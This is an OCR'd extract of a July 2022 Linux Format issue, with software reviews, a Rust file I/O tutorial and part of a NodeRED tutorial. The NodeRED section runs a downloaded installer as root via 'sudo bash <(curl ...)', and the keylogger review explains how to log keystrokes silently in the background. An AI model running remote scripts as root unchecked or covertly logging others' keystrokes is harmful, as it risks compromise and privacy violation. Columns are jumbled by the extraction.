use the tool for live collaboration. You can add nodes from here.

www.techradar.com/pro/linux July 2022 LXF290 85

HOTPICKS
OSINT TOOL
Sherlock
Version: N/A
Web: https://sherlock-project.github.io
pen source intelligence (OSINT) is the
O technique of gathering data and information
that’s publicly available. Sherlock is an
important command line tool that quickly collates such
information. The nifty little tool can find any username
across over 350 popular websites and social networks.
Sherlock requires Python 3.6 or higher, and works
on MacOS, Linux and Windows. Installation is a simple
matter of cloning the repository, and installing the
required components. You can then run the script
to query for a particular username across its list of
supported websites and social networks. You can
also specify multiple usernames at the same time.
One of the purposes of OSINT is to dig up
information about yourself. Anything that can be found
by OSINT tools can also be found and potentially
abused by threat actors. For instance, Sherlock results
will return the user’s profile page if it’s found on any of
the supported websites. The URL could either display
simple profile information about the user, or show their
complete public activity depending on the queried
KEYLOGGING TOOL
Simple
Keylogger
Version: 2.7.1 Web: https://simple-
keylogger.github.io
imple Keylogger is a program that records your
S keystrokes, and saves them in a log file on your
local computer.
You’ve probably heard of keyloggers for their use by
threat actors for unethical purposes, such as stealing
passwords and reading private data. However, there are
many legitimate uses for a keylogger as well.
For instance, business users can use a keylogger to
monitor their employees (what?!?–ED) in order to
ensure that they don’t venture near sensitive files or
copy or leak any confidential files. Similarly, schools
and other institutions track keystrokes to deter
students from using banned words, in a bid to deter
hate speech and prevent online bullying.
Keylogging also has an important role as a parental
control tool to help you track what your children are
doing on the computer in your absence. In fact, if you
86 LXF290 July 2022
In addition to
displaying the
websites where
the username was
found, the tool
can also output
sites where the
username was
not found.
website. For instance, the Telegram profile only displays
a profile picture of the user and gives the ability to send
a message to the user. However, the URL for social
networks like Twitter and Facebook will bring up all of
the user’s public posts.
You can use Sherlock to create a CSV file of the
results or save the output to a folder for later analysis.
The tool can also be used to make requests over Tor, as
well to use new Tor circuits for each request. Routing
the queries over Tor increases runtime, and requires Tor
to be installed. For faster results you can also direct
Sherlock to limit its analysis to specific websites. You
can also speed it up by limiting the time it waits for a
response from a website. A longer timeout will be more
likely to get results from slow sites, but this may cause
a long delay to gather all results.
The keylogger
will record all
keystrokes,
including the arrow
keys, making for a
rather jumbled log
file, which isn’t of
much use without
proper filtering.
have to leave your powered-on computer, a keylogger
can tell you if someone accessed your computer in your
absence and how. Finally, some people also use
keyloggers for self-analysis to capture their own
interactions with the computer.
Like all keyloggers, Simple Keylogger works in
the background logging all your keystrokes in a
timestamped log file under the current directory. It’s
written in Python, takes up very little in the way of
system resources, and works on Windows and MacOS
in addition to Linux.
You can install Simple Keylogger in Linux using
Python’s pip package installer. Once it’s installed, you
can run it in the background with the nohup command
to silently log all keystrokes. Once it’s up and running,
the utility will log all the keystrokes inside a time-
stamped .log file. When you’re done recording, use the
fg command to bring the keylogging command to the
foreground, and then use Ctrl+C to kill it.
www.linuxformat.com

AUDIO PLAYER
Siren
Version: 0.10
Web: www.kariliq.nl/siren
iren is a text-based audio player that has all the
S necessary features to enable you to enjoy your
music, without exerting a footprint on your
computer’s resources. It can play audio through various
sound libraries and servers including sndio, PulseAudio,
ALSA, OSS and Sun audio. Similarly, it supports a large
number of file formats including Ogg Vorbis, MP3, Opus,
FLAC, AAC, WavPack, WAVE and AIFF.
Siren’s user interface consists of three areas. The
bottom line is the status line. It’s used to display error
and informational messages and to enter commands
and search queries. The two lines above the status line
show playback-related information, such as the
currently playing track and the volume level.
The majority of the screen is used to display one of
the four supported views. There’s the library view that
displays all tracks in the library, followed by the playlist
view that shows the loaded playlist. Browser view shows
the contents of a directory, which by default displays
only directories and supported audio files. The browser
view can be used to browse through the file system and
TAG DATA VIEWER
MediaInfo
Version: 22.03 Web: https://mediaarea.
net/en/MediaInfo
A
re you the curious type? Then you can use
MediaInfo to view all kinds of technical details
about your media files, along with the tag
information for many audio and video files.
MediaInfo supports popular video formats, including
Matroska, WebM, DivX, XviD, AVI, WMV, QuickTime and
Real, as well as lesser-known or emerging formats. The
cross-platform tool has both a command-line interface
and a graphical interface to display the information.
The tool first displays data about the file’s container
such as its format, the format profile, codec ID, bitrate,
date of encoding and other general details. This is
followed by details about the video, including the name
of the format, codec ID, aspect ratio, frame rate, bitrate,
stream size and more. Next up, similar type of details
are displayed about the audio such as the format of the
stream, its codec id, sample rate, channels, bit depth, as
well as the language of the stream.
If your file has subtitles, MediaInfo will also display
relevant details such as the language of the subtitles,
and number of included elements, or lines of text.
www.techradar.com/pro/linux
HOTPICKS
All operations
in Siren can be
controlled from
the keyboard using
the predefined
keybindings.
either play back audio files or add them to the library.
Finally, there’s the queue view that shows all the tracks
that have been added to the queue. Tracks in the queue
will be played back before those in other views, and will
be removed automatically after playback. Of course,
Siren can display only one view at a time, but each view
can be selected with the select-view command or the
default key bindings.
Besides Linux, Siren also runs on MacOS and *BSDs.
It isn’t available in the repositories of the popular Linux
desktop distros, although its users have made pre-
compiled binaries for OpenSUSE and Arch Linux, as well
as for several BSD variants including FreeBSD,
OpenBSD and DragonFly BSD. Others will have to
compile it manually following the simple instructions in
its documentation. You also have the option to run Siren
from the source directory, without installing it first.
The project’s
website hosts an
online variant of
MediaInfo that
can display the
metadata about
your files in your
web browser,
securely without
uploading the files.
Similarly, if the file is made up of multiple chapters then
the tool will also display all relevant information about
the chapters as well.
MediaInfo supports various views. The default is
the Easy view that collates the information and
displays it as meaningful information. Advanced
media manipulators can switch to a different view
to show all the information in excruciating details. You
can also export the displayed information in various
formats including plain text, CSV, HTML and more.
The tool has binary packages for virtually all popular
distros such as Debian, Ubuntu, Fedora, OpenSUSE,
and Linux Mint. Furthermore, the project also produces
Flatpak, AppImage and a Snap for the program, making
it fairly easy to install in your distro.
July 2022 LXF290 87
HOTPICKS
KEYBOARD SOUNDS
Mechvibes
Version: 2.3.1
Web: https://mechvibes.com
ot everyone will have experienced typing on a
N mechanical keyboard, and therefore won’t
understand what the fuss is all about.
Mechvibes enables you to have a slice of the experience,
at least from a sound perspective.
Mechvibes’ author describes the program as a side
project that he put together to irritate his family and
friends by making his non-mechanical keyboard sound
just like a mechanical one. The application has an
intuitive user interface that you can use to customise
the sound for the keys on your keyboard. It includes
various themes to help you select the best mechanical
keyboard sound that appeals to you. Helpfully,
Mechvibes also enable you to adjust the volume for your
faux mechanical keyboard.
Furthermore, in addition to the standard sounds that
come along with the tool, Mechvibes offers a couple of
options to add additional sounds in a couple of steps.
One option is to use the More Sounds button that takes
you to the developer’s website where you can download
additional sound packs.
YOUTUBE DOWNLOADER
yt-dlp
Version: 2022.04.08
Web: https://github.com/yt-dlp/yt-dlp
t-dlp is a fork of the popular youtube-dl script
Y and also takes inspiration from the now-
inactive youtube-dlc. The main focus of this
project is adding new features and patches while also
keeping up to date with the original project.
The utility is dexterous and can download videos
from all types of feeds and private playlists. It can also
fetch tracks from YouTube Music, as well as entire
channels. The release also has an experimental feature
to download live streams from the beginning. You have
the option to split the downloaded videos into multiple
files based on chapters, and the script can speed up
downloads by downloading multiple fragments of a
video in parallel.
The main focus of yt-dlp development is adding new
features and fixes, as well as keeping all the relevant
features of the original project, such as format sorting.
For instance, as compared to the youtube-dl script, the
default format sorting options have been changed in
yt-dlp so that higher resolution and better codecs will be
now preferred instead of simply using larger bitrate.
88 LXF290 July 2022
Mechvibes has a voice sound pack that could help vision impaired users type a little easier.
One of MechVibes’ best features is its editor. This
enables you to edit existing sound packs or create one
from scratch, and share them with other MechVibes
users. To add custom keyboard sounds, you can record
any sound you like and then map them to the keys from
within the program. The latest release adds a whole lot
of custom sound packs. It also makes available a
shortcut in the system tray that you can use to quickly
mute MechVibes. Similarly, there’s also a new option
that you can use to launch the program during startup.
Mechvibes is a cross-platform that besides Linux,
also runs on Windows and MacOS. The program
produces a .deb binary, but there’s an AppImage, and
Mechvibes is also listed in the Snapcraft store, making it
fairly straightforward to get started.
Despite its name,
yt-dlp can fetch
videos from
hundreds of video
sharing services.
Interestingly, you can also mark or remove sponsor
sections in YouTube videos by utilising the
SponsorBlock API.
One of the best things about yt-dlp is that its
developers have put in quite a bit of thought to select
the right default options depending on how the program
is used. For instance, it’ll download the best available
quality if you don’t pass any options. However, this
setting will change automatically if multiple
audiostreams are enabled, or if the tool can’t find
ffmpeg on the system.
The project has pre-compiled binaries for Linux, and
can also be installed from Python’s pip package installer.
Given its command-line nature, and rich set of features,
our advice to first time users would be to peruse
through its usage documentation on the project’s
website. This will not only familiarise you with the
scripts options, but also help you appreciate the tool’s
flexibility offered by the tool. You can configure yt-dlp
by placing any supported command line option to a
configuration file.
www.linuxformat.com

ROLE-PLAYING GAME
Eternal Lands
Version: 1.9.6
Web: www.eternal-lands.com
ternal Lands (EL) is a multiplayer, online role-
E playing game (MMORPG) set in a fictional
medieval fantasy world. The game offers
everything you’d expect from such a setting, such
as period-accurate weapons and architecture.
Complimenting these are several other fictional
elements that you get in other games with a similar
setting, including other humanoid races and magic.
The game has over a dozen maps across two
continents. Players begin play by selecting the race,
name and appearance of their character. Skills, abilities
and alignments are automatically given initial values.
The game offers several races such as humans, elves
and dwarves. Three of the offered races are pay-to-play
races and players must pay a fee to play a character of
one of these three races.
Like its peers, EL offers a handful of skills, including
attack, defence, alchemy, magic, potion, summoning,
crafting and engineering. One of the good things about
the game is that there are no fixed class restrictions,
which enables players to freely develop their character.
RACING SIM
Speed Dreams
Version: 2.2.3
Web: www.speed-dreams.org
peed Dreams is a motorsport simulation and
S racing game, which began life as a fork of the
venerable Torcs racing car simulator. Thanks to
constant improvements over the years, Speed Dreams
has now grown to include several interesting features,
cars, tracks and AI opponents, and offers a more
enjoyable experience, and excellent physics realism.
The game offers several different racing modes, from
a simple practice session to a full-time career. The latest
release adds three new car sets, namely 1936 Grand
Prix, Supercars and Long Day Series GT1, each featuring
a variety of cars and car classes. In all, the game
includes a total of 82 cars under 16 different car sets.
Speed Dreams also includes animated drivers on the
1936 Grand Prix cars, and offers 3D wheels for all cars.
The new release boasts of brand new gauges, new
liveries for all the cars, as well as an updated version of
the original TRB1 car set from TORCS, with a more
realistic behaviour. The game includes a variety of
tracks, and the addition of the three new ones in the
latest release brings the total number of tracks to 21.
www.techradar.com/pro/linux
Games HOTPICKS
EL isn’t just about combat, either. The game If you don’t want
developers insist that instead of waging battles, to read through
documentation, be
many players focus on more peaceful activities
sure to talk to the
such as collecting resources and creating items. tutorial NPC who’ll
The game is available as a Snap, Flatpak and set you up with
AppImage, so getting started is a piece of cake. The the basic gear you
movement and interactions should be familiar to need to survive
and make money.
anyone used to playing MMORPGs. However, the
game has an extensive wiki that new players are
encouraged to read through to familiarise themselves
with EL, its terminology and the various maps.
Everyone starts with the Isla Prima map, which
includes a tutorial NPC who can take new players
around EL. There are various animals on Isla Prima
but no monsters. The tutorial NPC can also heal
players for free while their attack level is below a
certain threshold.
One of the best things about the game is its Speed Dream
accurate driving behaviour, thanks to its various developers are
so proud of their
physics engines. The new release includes an
realism that they
experimental Simu V3 physics engine, too. invite researchers
Speed Dreams offers customisable daytime and to use their
weather conditions, supports up to four local physics and AI as a
multiplayer users in split-screen mode, and includes teaching resource.
several different AI bots to race with. The game can
be played with a variety of input devices, though
support for force feedback is still under development.
A lot of work has been done over the years to
improve not just the game, but also the player
experience. The graphics, time, and weather settings,
and game modes have matured quite well. Speed
Dreams is available as an AppImage and a Flatpak, as
well as a XtraDeb PPA for Ubuntu users.
July 2022 LXF290 89
HOTPICKS
BACKUP UTILITY
Snap Backup
Version: 6.4.0
Web: https://snapbackup.org
ne of the reasons why many people fail to take
O backups is because the popular programs for
the task are too complex to use. That’s
because in their bid to offer their users more bang for
the buck, they pile on options and features that only
make the tool unapproachable for first-time users.
In stark contrast, Snap Backup bills itself as a simple,
one-click backup tool that creates backups of select
files and folders inside a compressed archive, and
nothing more. It doesn’t include any other options,
whatsoever. That’s because the application is designed
for people who just want to back up their data files, and
nothing else.
Snap Backup has a simple, intuitive interface that’s
easy to navigate. You begin by selecting the directories
you want to back up, before selecting the destination
location, which can be a separate internal drive, a
removable one. And that’s about it for your options.
Hit the Backup Now button and the application will
save the selected files and folders in a compressed
ZIP archive on the destination.
ADVANCED GREP
ugrep
Version: 3.7.9
Web: https://github.com/genivia/ugrep
G
rep is one of the oldest Unix commands. In
addition to fixed search terms, it can also
search for patterns with wildcard characters.
Virtually all Linux distros ship with the GNU variant of
grep, which extends the features of the original grep in
some places, most notably, allowing recursive searching
in directories.
Ugrep is a faster, user-friendly variant of grep that
uses new match algorithms for ultra-fast operations.
It’s written for advanced users who can appreciate and
make good use of its rich set of features and speed.
For all intents and purposes, ugrep is a drop-in
replacement for the standard GNU grep utility, and also
supports all its options. It can match Unicode patterns
by default in UTF-8, UTF-16 and UTF-32 encoded files,
as well as match across multiple lines with \n and \R
regex patterns.
Moreover, ugrep can find approximate pattern
matches with fuzzy search, and can search with Google-
like Boolean query patterns, which can also be applied
to files as a whole. Another useful feature is that you
90 LXF290 July 2022
The tool offers no frills, and isn’t a good option for Snap Backup can
users that crave for more dexterity. So, for instance, optionally create a
copy of the backup
you can’t use Snap Backup to backup entire disks,
to another location
or take incremental backups. It also lacks any for safe keeping,
automation features, although it’s possible to set it up like a USB drive or
with a cron job to take backups on a fixed schedule. an external disk.
The good thing about Snap Backup is that it supports
different profiles for different users, and you can also
filter the contents that are meant to be backed up.
Snap Backup is written in Java and can be run on
any operating system that supports Java 5 or greater.
Although the program is fairly simple to operate it
does come with a user manual. We’d advise first
timers to quickly browse through it to understand
the best practices for taking backups.
Ugrep includes
built-in help, for
instance, ugrep
--help regex will
display detailed
information
about its support
for regular
expressions.
can apply search patterns in ugrep excluding negative
patterns. They let you, for example, ignore matches if
they occur in comments.
Ugrep supports archive types including CPIO,
JAR, PAX, TAR and ZIP, compressed with all common
methods (BZIP, GZ, LZ and XZ). In addition, you can
use filters to prepare data in special formats in
advance. For example, PDF documents can be
converted to text with a filter, before ugrep performs
the search.
The latest version of ugrep introduces a new option
that opens a query text-based user interface (TUI)
that searches files as you type. The output can be
sorted by name, best match, size and time, and can
be exported in CSV, JSON, XML and other formats.
Linux users can build ugrep manually following the
instructions on its website. However, it’s also available
in the repos of some mainstream distros such as
Debian, and Ubuntu.
www.linuxformat.com
CODING ACADEMY
CODING ACADEMY

RUST

Code read/write
system file tools
So, you woke up today wanting to know how to use file input and output
calls to code system tools in Rust? Then Mihalis Tsoukalos can help.

he subject of this tutorial is file input and

T output (I/O) in Rust. File I/O is an important

part of every operating system. An OS or even
a database system wouldn’t be able to function without
being able to process, read, write and append to files.
OUR Apart from file I/O, in this tutorial we’re going to learn
EXPERT about error handling in Rust and the handy vector data
type. In Rust, proper error handling is directly connected
Mihalis to pattern matching as well as the Result and Option
Tsoukalos data types, which we’ll also touch upon.
is a systems
engineer and File descriptors
a technical A UNIX file descriptor is a positive integer value. UNIX
writer. You can supports three special and standard filenames: /dev/
reach him at stdin, /dev/stdout and /dev/stderr. These can also be Here’s the code of errorHandling.rs as well as its output with and
@mactsouk. accessed using file descriptors 0, 1 and 2, respectively. without the RUST_BACKTRACE environment variable set. RUST_
In addition, file descriptor 0 can be accessed using BACKTRACE can obtain a more detailed output in case of an error.
/dev/fd/0 – remember that in UNIX and in Linux
everything is a file. Later in this tutorial, we’re going to We try to match a variable named m that’s of the
discuss the use of stdin, stdout and stderr in Rust. Now MyValues type, which is an enum defined earlier.
that we know about file descriptors, let’s crack on with MyValues has only three possible values (according to
pattern matching in Rust. its definition), so there’s no need for a default branch.
Running enums.rs prints the x: 3 y: 5 message because
Pattern Matching the value of m is equal to MyValues::XY{x:3, y:5} .
Pattern matching can be handy, but should be used In practice, this means that pattern matching with
A Rust trait is with caution because it can create bugs and unforeseen enums is safer because you already know the finite
a collection side-effects. In Rust we use the match keyword for values that you’re looking for. If you want to perform
of methods pattern-matching operations. A match statement more complex tasks that require the use of regular
defined for an should catch all possible values of the used variable, expressions, then the regex crate (https://github.com/
unknown type: so having a default branch at the end of the block rust-lang/regex) might be more appropriate for your
Self. Put simply, is common practice. The default branch is defined job. In that case, you should create a Cargo project that
a trait describes
with the help of the underscore character, which is a includes regex as one of its dependencies.
an abstract
synonym for the “catch everything that’s not specifically
interface
that can be matched” case. There are some rare situations where a Error handling
implemented default branch isn’t required – once such case is a Being able to handle errors is important in all system
by other data condition that can be either true of false. Another such operations and utilities. There are two main approaches
types. So case is when we examine the finite values of an enum to error handling, not only in Rust but in general: either
traits define a data type – this is illustrated in enums.rs. The logic of handle the error condition and continue program
behaviour. See enums.rs is found in the following match block: execution; or stop program execution until the error is
https://doc. match m { corrected. Neither of them is perfect. Most of the time a
rust-lang.org/ MyValues::One => println!{"One"}, combination of both works better. However, there are
std/io/trait.
MyValues::Two => println!{"Two"}, situations where an error condition is so severe that the
Read.html.
MyValues::XY{x, y} => println!{"x: {} y: {}”, x, y}, program needs to stop. This includes situations such as

92 LXF290 July 2022 www.linuxformat.com

 System file tools CODING ACADEMY

no network connectivity or the absence of a key The Rust code

resource like a configuration file or an data file.
In errorHandling.rs we present both approaches. The
important part of errorHandling.rs is the following:
match a {
Some(v) => println!("x: {}”, v),
None => println!("Error but continue!"),
} the input file in
If the a Option value contains an actual value, then
this value is printed on screen. If the value of a is None,
then the program is going to print an error message and
continue its execution. This means that you can have
recoverable errors when you’re using Option – and the
same applies to Result.
The screenshot (left) shows the Rust code of
errorHandling.rs as well as the output when using the
RUST_BACKTRACE=1 environment variable. Rust uses
panic!() for forcing program termination when there’s
an unrecoverable error – no code is executed after a call
to panic!() .
Reading a file
Rust uses readers and writers for reading and writing to
files, respectively. A Rust Reader is a value that you can
read from, whereas a Rust Writer is a value that you can
write data to. There are various traits for readers and
writers, but the standard ones are std::io::Read and
std::io::Write , respectively. Similarly, the most
common and generic ways for creating readers and
writers are with the help of std::fs::File::open() and
std::fs::File::create() , respectively. Note that
std::fs::File::open() opens a file in read-only mode.
The logic of read.rs is found in this code excerpt:
let mut input_file = File::open(input).unwrap();
let mut buf = [0u8;BUFFER_SIZE];
The first statement opens the desired file for reading
only, whereas the second file creates a buffer for
reading the file in chunks. Although there are Rust
functions for reading a file line by line or all at once,
of read.rs, which
illustrates how to
read a plain text
file using a buffer.
The buffer size
specifies the size
of the chunks that
you read from
each iteration.
using a buffer makes more sense when you don’t
know how you’re going to process the file. Later on
in this tutorial we’re going to learn how to read a plain
text file line by line.
The screenshot (above) shows the code of read.rs
where you can see the while loop used for reading the
entire input file. The read operation is implemented with
multiple calls to input_file.read(&mut buf) – the data is
stored in the buf variable in UTF8 encoding, which is the
reason for using std::str::from_utf8() in order to print it
as plain text on screen.
Note that in Rust files are automatically closed when
they go out of scope. Therefore you are not going to see
a close() method for closing a file that you opened or
created. At this point you can compile and use read.rs
on your own and maybe experiment with it a little. The
next section is about creating a new empty file.
Creating a new file
In this section, we’re going to illustrate how to create a
new empty file. The technique is illustrated in create.rs
and its core functionality can be found in this statement:
std::fs::File::create(input).expect("File creation failed!");
The empty file is created using the File::create()
function. The expect() part at the end of the
File::create() function call is going to be executed if

EXPECT AND UNWRAP

Both expect() and unwrap() are used
with the Result and Option data types
and allow you to deal with error and
unexpected conditions. Put simply, they
allow you to get the value from a Result
or Option variable, if it exists, or deal with
the error condition the way you want to.
The generic format of a Result value is
<&a_value, Error> , which means that we
can either get Ok(&a_value) if it exists or
get an Err(Error) value whereas the
generic format of an Option value is
Option<&a_value> , which means that we
either get a valid value Some(&a_value)
or None . Bear in mind that Some is a
data constructor. You can learn more
about Option and Some by visiting
https://doc.rust-lang.org/std/option/
enum.Option.html.
Having a Result value returned by a
function named get_result() , we can
extract its data as follows: program. However, expect() allows you
match get_result() { to set a custom panic error message. In
Ok(v) => println!("{}”, v), practice, this means that if you want to
Err(e) => println!{"get_result() error: avoid panicking and handle an error
{}”, e}, condition the way you want, you should
} use a match block instead. Last, if you
Similarly, having an Option value want to panic from inside a match block,
returned by a function named get_ you can replace println!() with panic!() .
option() , we can extract its data as All these and many more are illustrated in
follows: expect.rs. Running expect.rs generates
match get_option() { the following output:
Some(v) => println!("{}”, v), $ ./expect
None => println!("get_option(): No a_value: 123
value!"), get_result() error: This is an error
} message.
Both presented cases are easy to x: 123
understand, but require you to write thread ‘main’ panicked at ‘get_result()
some extra code. This is where unwrap() invalid input: “This is an error
and expect() come into play. The message.“’, expect.rs:31:26
expect() call is similar to unwrap() in Use a RUST_BACKTRACE=1 environment
the sense that they both panic your variable to display a backtrace.

www.techradar.com/pro/linux July 2022 LXF290 93

CODING ACADEMY System file tools
there’s an error condition in the process. So, if you see
the error message, it means that the file creation has
If you’re keen to failed and the program execution is going to stop. The
experiment with expect() part and its connection to unwrap() are
file I/O in Rust, explained elsewhere in this tutorial.
you can try Using create.rs will verify its functionality:
implementing $ ./create /tmp/newFile.txt
the cat utility.
File created!
You could also
$ ls -l /tmp/newFile.txt
write a utility
that reads -rw-r--r-- 1 mtsouk users 0 Nov 2 19:45 /tmp/newFile.
plain text files txt
and replaces $ ./create /tmp/newFile.txt
a predefined The /tmp/newFile.txt path already exists!
string with First, we execute the utility in order to create an
another one, empty file (/tmp/newFile.txt). Next, we verify that
and then writes /tmp/newFile.txt is there and that it’s empty. As seen
the output to a in the last command, if we try to create a file path that
different file.
already exists, the utility isn’t going to proceed for
security reasons.
Now that we know how to create a file, it’s time to
learn how to write data to it.
Writing to a file
For write.rs to work, the destination file shouldn’t exist
in advance – this prevents you from overwriting existing
files. The important part of write.rs is presented here:
let mut file = File::create(input).expect("Cannot open
file.“);
file.write_all("LXF\n”.as_bytes()).expect("Write
failed!");
First, we open the file for writing using a call to
File::create() and then we write as much information to
it as we want using a single or multiple write_all() calls
– in this case using a single call. As it happens with
reading, we don’t have to close the file after we finish
writing. According to the UNIX philosophy, write.rs
produces no output on a successful operation and an
error message in case of failure.
Another operation that’s similar to writing is
appending to an existing file. The append.rs file shows
that technique, which is based on the following code:
let mut file = OpenOptions::new().append(true)
.open(input)
.expect("Cannot open file.“);
So, we’re using OpenOptions::new() with the
append(true) option to declare that we want to open
the input file for append. The screenshot (below) shows
the code of append.rs. Remember that append.rs
requires that the file which is going to be used already
Here’s the code
of append.rs that
shows how to open
an existing file for
append in Rust.
94 LXF290 July 2022
Here you can see the source code of byLine.rs, which processes plain
text files line by line using a reader.
exists, which is being tested before trying to open the
file. Finally, the write operations are implemented with
the two file.write_all() calls. We test append.rs with
$ ./append /tmp/appendFile.txt
/tmp/appendFile.txt does not exist!
$ touch /tmp/appendFile.txt
$ ./append /tmp/appendFile.txt
$ ./append /tmp/appendFile.txt
Execute cat /tmp/appendFile.txt to make sure that
/tmp/appendFile.txt contains the expected data.
Standard things
In this section, we see the use of stdin , stdout and
stderr as presented in stds.rs. The logic of stds.rs can
be found in the use of std::io::stdin() , std::io::stdout()
and std::io::stderr() for stdin , stdout and stderr ,
respectively. All three can be assigned to variables and
used as such. Interacting with stds.rs produces the
following output:
$ ./stds
Please give me your name:
Linux Format
13 bytes read
Your name is Linux Format
This is an error message!
That is another error message!
Writing to stdout!
Rust uses the eprint!() and eprintln!() macros for
writing to standard error, which is a pretty handy
approach. Alternatively, you can write text to standard
error via std::io::stderr() . The next section shows how to
read a plain text file line by line.
Line by line
Reading a file line by line is handy because most of the
times this is how we process plain text files. The logic of
byLine.rs is found in the following statements:
let file = BufReader::new(File::open(&input_path).
unwrap());
for line in file.lines() {
let my_line = line.unwrap();
println!("{}”, my_line);
}
The input file is opened using BufReader::new() and
File::open() and read using a for loop that keeps going
for as long as there is something to read from the given
input file. The for line in file.lines() statement is what
reads the file line by line. The screenshot (above) shows
the Rust code of byLine.rs, which can accept and
process multiple command line arguments.
www.linuxformat.com
 System file tools CODING ACADEMY

THE VECTOR DATA TYPE

The Vector data type is very popular in
Rust, so it deserves some extra attention.
First of all, a Vector is like an array. As is
the case with arrays, index values start
from 0. The main advantage of vectors
over arrays is that vectors can be resized,
provided that they’re declared as
mutable. You can put or remove vector
elements using pop() and push(),
respectively. Additionally, apart from the
size, which is the number of elements
stored, a vector has a capacity, which is
the amount of memory reserved for the
vector. Finally, a vector represents a
pointer to the data.
You can select the part of a Vector that
you want to access using an index range,
as occurs in read.rs. So, for a vector
named a_vector, you can select its first
two elements by writing &a_vector[0..2] .
You can iterate over the elements of a
vector in various ways. One such way
is by using a for loop using the index of
the element you want to access. Another
approach is to use an iterator, which for
a_vector is called as a_vector.iter() , to
obtain all vector elements one by one.
Remember that if you use an index value
greater than or equal to the length of
the vector, your code is going to crash.
The same is going to happen if you use
pop() on an empty vector. The solution to
both issues is to use a match block to
check whether you’re trying a valid
operation or not.
All these and many more are illustrated
in vector.rs. Feel free to look at the code
of vector.rs and experiment with it.
Running vector.rs produces the following
type of output (some output is omitted):
a_vector is: [2, -2, 12]
The first element of a_vector is 2
...
an_element is None
Pop(): it is not defined!

Let’s take this knowledge and implement the
functionality of the wc command line utility in Rust.
This tool can process multiple files and create a
summary at the end. The core functionality of
wc.rs can be found in the next for loop:
for line in file.lines() {
let my_line = line.unwrap();
total_lines = total_lines + 1;
total_words += my_line.split_whitespace().count();
total_chars = total_chars + my_line.len() + 1;
} file. The entire code of copy.rs is surprisingly small for
What the previous code shows is how to count the
number of lines, words and characters of the input file.
Calculating the number of lines when reading a file line
by line is straightforward and requires updating a
counter ( total_lines ) each time a new line is read.
The number of words in a line is found by splitting
the line in words based on the whitespace characters
and counting the number of words. The number of
characters is calculated using the length of the line plus
one to include the newline character at the end.
The screenshot (below right) shows part of the code
of wc.rs. The logic and the flow of wc.rs is heavily based
on the code of byLine.rs. Apart from the code example
presented earlier in this section, wc.rs has three
additional variables for updating the total number of
lines, words and characters of all files that have been
read so far. If wc.rs has to process a single plain text file
only, then no summary is printed at the end.
Additionally, notice the use of the count() method
instead of len() to calculate the length of a line. This
happens because the output of the len() function and
the output of the chars().count() function might not be
the same when dealing with text files that contain
Unicode characters. For an ASCII file, their output
should be the same. Bear in mind that if you want to
allocate a buffer to store a given string, the len()
function is the correct choice.
Copying a file
In this final section we’re going to write a utility that
copies a file by reading it in small chunks using a buffer.
The logic of copy.rs is found in the following statements:
let read_bytes = input_file.read(&mut buf).unwrap();
if read_bytes!=buf.len() {
cont=false
}
The previous code states that we should keep
reading the input file using a buffer and that we should
stop the process when the bytes that were read are
smaller than the buffer size, because in that case it
means that there’s nothing more to read from the input
such an important and powerful utility. We print a .
each time we write to the output file in order to keep
track of the progress of the utility.
As you might have observed from the presented
code in this series of tutorials, the core functionality
of almost all utilities is implemented in just a small
collection of statements. However, most of the
remaining code is about making sure that we obtain
a valid input and identify potential error conditions.
Reliability is important in systems programming. Next
month’s Rust tutorial is going to discuss working with
UNIX processes and signal handling
The help page of std::io can be found by visiting
https://doc.rust-lang.org/std/io. The most widely used
aspects of std::io are the Read and Write traits, which
provide the most generic interfaces for the reading and
writing functionality.
This screenshot
shows the Rust
code of wc.rs,
which implements
the functionality of
the wc UNIX utility.

EXPERIENCE OUR I/O SYSTEM… Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux July 2022 LXF290 95
CODING ACADEMY NodeRED control
NODERED
Use Home Assistant
NodeRED devices
NodeRED is a graphical programming language that’s ideally suited
to IoT, electronics and home automations, reveals Matt Holder.
odeRED is an open source graphical
N programming environment that can be used to
complete a large number of tasks. Graphical
programming languages tend to be more intuitive than
textual programming languages and can be easier to
OUR learn. Support is built into Raspberry Pi OS. Useful
EXPERT libraries are pre-installed, which include access to the
Pi’s General Purpose Input Out (GPIO) pins, so that
Matt Holder programs can access input and output devices in the
has worked in IT real world. Using this library, the NodeRED system can
support for over a use real-world data to perform tasks. NodeRED uses the
decade. He’s has terminology of Flows to represent programs, while
always tried to Nodes are added to the canvas to build flows.
utilise Linux This article will focus on both the NodeRED
alongside the integration with Home Assistant and how it can be
other installed used to create powerful automations based on many
systems. different data sources as well as its usage from within
Raspberry Pi OS. First of all, Raspberry Pi OS will be
used. This can be installed by using the Raspberry Pi
Imager tool. Download and open the GUI (www.
raspberrypi.com/software) and select which
memory card the image should be written to:
$ sudo bash <(curl -sL https://raw.githubusercontent.
com/node-red/linux-installers/master/deb/update-
nodejs-and-nodered)
$ node-red admin init
When running the latter command, follow the
prompts in the wizard to set options. Once a username
and password has been set, enable the service:
$ sudo systemctl enable nodered.service
Finally, reboot the Pi. When logged in again open a
browser and visit http://<YOUR_IP>:1880. This web GUI
can also be visited by another device on the network – it
doesn’t have to be the Pi itself. Log in using the
This shows how a flow can turn
on an LED when the switch
is pressed. Also, a counter is
incremented and output shown
in the debug panel.
96 LXF290 July 2022
username and password established during the setup
process and look at the welcome wizard, which details
some useful tips. The final step to configure NodeRED is
to install the counter module. This can be done by using
the Settings menus and using the controls in the GUI.
(Hamburger Menu> Settings> Palette> Install) and
search for node-red-contrib-counter .
Go with the flows
NodeRED has a large number of Nodes available as
standard and these enable Flows to be built consisting
of input, output and other actions. For our first example,
the diagram (bottom left) details a Flow, which takes the
value from a switch and increments a counter based on
the switch being pressed. When the counter increments,
a log message is reported, which details the new value.
An LED is also flashed whenever the switch is pressed.
The simple circuit diagram (right) shows what’s required
to enable this Flow to work as expected.
Stepping through this Flow from left to right, the first
Node is from the Raspberry Pi palette (at the bottom of
the toolbox) and is the RPi-GPIO In node. Drag this to
the canvas and double-click to open the options. Select
the pin to be used (this example uses 13 or GPIO27) and
select Pulldown from the resistor options.
The second blue Node is of type RPi-GPIO Out. Edit
the options and set the pin to 11 or GPIO17. Select the
Initialize Pin State button and then set the value to high.
A Flow containing these two Nodes would turn on the
LED whenever the button is pressed. The first yellow
